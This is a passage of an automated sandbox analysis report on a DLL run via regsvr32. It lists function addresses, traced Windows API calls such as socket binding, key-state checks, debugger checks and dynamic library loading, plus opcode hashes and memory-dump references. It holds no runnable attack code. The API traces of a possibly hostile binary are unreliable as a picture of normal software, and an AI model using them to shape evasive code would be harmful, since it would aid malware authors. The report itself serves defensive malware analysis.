                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
                                                                                                          • String ID:
                                                                                                          • API String ID: 1641187343-0
                                                                                                          • Opcode ID: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
                                                                                                          • Instruction ID: 3b67d6bb43f4ea54dfbebb57807521158ddd2742ca645746548a7aae3598e2fb
                                                                                                          • Opcode Fuzzy Hash: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
                                                                                                          • Instruction Fuzzy Hash: F3E04F386442069BE760DFA4D846B4DB6E0EF01762FA04628F9D1EB2C2DF70AD80DB15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10035645, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 317 10035645-10035667 HeapCreate 318 1003566b-10035674 317->318 319 10035669-1003566a 317->319
                                                                                                          APIs
                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,1002E896,00000001,?,?,?,1002EA0F,?,?,?,1004E6A8,0000000C,1002EACA), ref: 1003565A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 10892065-0
                                                                                                          • Opcode ID: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
                                                                                                          • Instruction ID: 0df5893edc33e170cd9319f6da52f4968d67da800731ff8b92bc7feba6a3d305
                                                                                                          • Opcode Fuzzy Hash: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
                                                                                                          • Instruction Fuzzy Hash: 17D05E329507559EF7029F716C49B223BDCE384A96F048436F80CC61A0E670C6418A04
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Non-executed Functions

                                                                                                          Function 1003C7D2, Relevance: 66.4, APIs: 44, Instructions: 432COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___getlocaleinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 1937885557-0
                                                                                                          • Opcode ID: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
                                                                                                          • Instruction ID: b04c4d7f6a57d8df90e79b3f21b47685716bac7d418787b81275d3872e324d7c
                                                                                                          • Opcode Fuzzy Hash: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
                                                                                                          • Instruction Fuzzy Hash: 0DE1DDB294060DBEEF12CAE1CC85DFFB7BDFB04744F14096AB255E6041EA71AB059B60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10001160, Relevance: 10.6, APIs: 7, Instructions: 71networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WSAStartup.WS2_32(?,?), ref: 10001194
                                                                                                          • _memset.LIBCMT ref: 100011A8
                                                                                                          • htonl.WS2_32(00000000), ref: 100011C1
                                                                                                          • htons.WS2_32(?), ref: 100011D5
                                                                                                          • socket.WS2_32(00000002,00000002,00000000), ref: 100011EB
                                                                                                          • bind.WS2_32(?,?,00000010), ref: 10001210
                                                                                                          • setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 10001252
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 1003240404-0
                                                                                                          • Opcode ID: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
                                                                                                          • Instruction ID: 8b71fe392eebb4791ef10e00b80357e65c28fbed0d3ec8f38f9f26760835bea4
                                                                                                          • Opcode Fuzzy Hash: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
                                                                                                          • Instruction Fuzzy Hash: D6317C74A01228AFE760CB54CC85BE9B7B4FF8A714F0041D8E949AB281CB71AD80DF55
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002129B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _strcpy_s.LIBCMT ref: 100212CD
                                                                                                            • Part of subcall function 100210FF: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                            • Part of subcall function 100210FF: __cftof.LIBCMT ref: 10023B88
                                                                                                            • Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24
                                                                                                          • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 100212E5
                                                                                                          • __snwprintf_s.LIBCMT ref: 1002131A
                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 10021355
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8InfoLibraryLoadLocaleThrow__cftof__getptd_noexit__snwprintf_s_strcpy_s
                                                                                                          • String ID: LOC
                                                                                                          • API String ID: 1016519223-519433814
                                                                                                          • Opcode ID: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
                                                                                                          • Instruction ID: e5882df6752d869781cd97db702e75e799ef83d3d4dcb43d327d0f518dc3dfd8
                                                                                                          • Opcode Fuzzy Hash: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
                                                                                                          • Instruction Fuzzy Hash: A021063990121CAFDB11EBA0EC46BDD33EEEB05751F9004A1FA04DB491DB70AE45C6A0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002DB0D, Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 10031D3A
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10031D4F
                                                                                                          • UnhandledExceptionFilter.KERNEL32(10049478), ref: 10031D5A
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 10031D76
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 10031D7D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 2579439406-0
                                                                                                          • Opcode ID: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
                                                                                                          • Instruction ID: eb2889493d924e234dee94db6a5018ee6042f58a5b7914c10149dcbc3be7d463
                                                                                                          • Opcode Fuzzy Hash: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
                                                                                                          • Instruction Fuzzy Hash: C8219AB8C01A24DFF742DF68DDC96883BB4FB1C345F52102AE9088B665E7B06985CF15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10027958, Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB
                                                                                                          • GetKeyState.USER32(00000010), ref: 1002797E
                                                                                                          • GetKeyState.USER32(00000011), ref: 10027987
                                                                                                          • GetKeyState.USER32(00000012), ref: 10027990
                                                                                                          • SendMessageA.USER32 ref: 100279A6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: State$LongMessageSendWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1063413437-0
                                                                                                          • Opcode ID: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
                                                                                                          • Instruction ID: a80f2be592eaa4d0f51a0e10a6f75c43a55355dd3138243e3a8160c71d5bf3bd
                                                                                                          • Opcode Fuzzy Hash: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
                                                                                                          • Instruction Fuzzy Hash: 0AF0E93A7C035B66EA10E6707C81F950814FF45BD4FC11431BF49EA1D2DFA0C89119B0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10021183, Relevance: 4.5, APIs: 3, Instructions: 40COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 1002118E
                                                                                                          • LockResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 1002119C
                                                                                                          • SizeofResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 100211AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$LoadLockSizeof
                                                                                                          • String ID:
                                                                                                          • API String ID: 2853612939-0
                                                                                                          • Opcode ID: 8b420e262c7312fbbd320bda05a88a884026fa2b8a5d750ea2b9a6c299d0f1d4
                                                                                                          • Instruction ID: 5885e8a255633e1cc81cd5e62f2e9d9df206611330dfebe0406f5a0ab521e5b9
                                                                                                          • Opcode Fuzzy Hash: 8b420e262c7312fbbd320bda05a88a884026fa2b8a5d750ea2b9a6c299d0f1d4
                                                                                                          • Instruction Fuzzy Hash: 7FF0F03A60013BA7CF219F69FC044E97BD5FF107E67414425FEA9C2060E231D870D680
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100250A3, Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8d3cc7cabb4d58ad44b84df687ee6d4ed92987b137f1ec63db657d71093bb1ad
                                                                                                          • Instruction ID: 0d7c4b7ad1d73a1697217a780c63f05e975ccc5f711293de909a3a3b9b9d2103
                                                                                                          • Opcode Fuzzy Hash: 8d3cc7cabb4d58ad44b84df687ee6d4ed92987b137f1ec63db657d71093bb1ad
                                                                                                          • Instruction Fuzzy Hash: 16F0A431600109ABDF11DF60DD88A9E7FB8FF05346F908021FC1AC5061DB32CA55EB99
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10001280, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • recvfrom.WS2_32(?,?,00000400,00000000,?,00000010), ref: 100012CF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: recvfrom
                                                                                                          • String ID:
                                                                                                          • API String ID: 846543921-0
                                                                                                          • Opcode ID: cdd5b8fa6bd2be514b31e1496784718f03a02615474b077ae9b11ea931df357f
                                                                                                          • Instruction ID: 69fb0fddd724ab168ece224e86e76236123086ad7b1ad86b3e1ae6067053412b
                                                                                                          • Opcode Fuzzy Hash: cdd5b8fa6bd2be514b31e1496784718f03a02615474b077ae9b11ea931df357f
                                                                                                          • Instruction Fuzzy Hash: 1B0125B5A0011C9FDB14CF58CD54BEEBBB9FF88304F4045A9E609A7241D7B46A84CFA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100214CB, Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 158libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 100214D5
                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10021555
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10021563
                                                                                                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
                                                                                                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100215CD
                                                                                                          • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,Function_00020C25,?), ref: 100215EA
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 1002161D
                                                                                                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 10021626
                                                                                                          • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
                                                                                                          • _memset.LIBCMT ref: 10021689
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                                                                                                          • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                          • API String ID: 3537336938-2299501126
                                                                                                          • Opcode ID: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
                                                                                                          • Instruction ID: 3754a4cc769aa270db1ce7901eb040107ed5b3d0b04ae9dca27c5b132e5f9257
                                                                                                          • Opcode Fuzzy Hash: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
                                                                                                          • Instruction Fuzzy Hash: 77515974C002289BCB61DF659C44BEDBAF4EB59300F5002EAE988E3291DB749E81CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10034610, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,1004E800,0000000C,1003474B,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 10034622
                                                                                                          • __crt_waiting_on_module_handle.LIBCMT ref: 1003462D
                                                                                                            • Part of subcall function 1003065C: Sleep.KERNEL32(000003E8,00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 10030668
                                                                                                            • Part of subcall function 1003065C: GetModuleHandleW.KERNEL32(00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F,?), ref: 10030671
                                                                                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10034656
                                                                                                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 10034666
                                                                                                          • __lock.LIBCMT ref: 10034688
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 10034695
                                                                                                          • __lock.LIBCMT ref: 100346A9
                                                                                                          • ___addlocaleref.LIBCMT ref: 100346C7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                          • API String ID: 1028249917-2843748187
                                                                                                          • Opcode ID: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
                                                                                                          • Instruction ID: 0d6301bb9ab871ffe84231295dfe76788f8a31cd98ef4b571f500b89faff28c9
                                                                                                          • Opcode Fuzzy Hash: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
                                                                                                          • Instruction Fuzzy Hash: 1C11AF79801741AFE711CF79CD42B8ABBF0EF45311F214969E499EB2A0CB74AA40CB59
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10020C3F, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32), ref: 10020C68
                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 10020C85
                                                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10020C92
                                                                                                          • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10020C9F
                                                                                                          • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10020CAC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                          • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                          • API String ID: 667068680-3617302793
                                                                                                          • Opcode ID: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
                                                                                                          • Instruction ID: 164c5ab3b4a161f1fd64f3c59e5fc8043f34cbc47aed943c162e41eaa6e30758
                                                                                                          • Opcode Fuzzy Hash: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
                                                                                                          • Instruction Fuzzy Hash: 621130F1C002A19BDB11DF99ADC484ABFE9F656240363427FF218D3221EB708854CE17
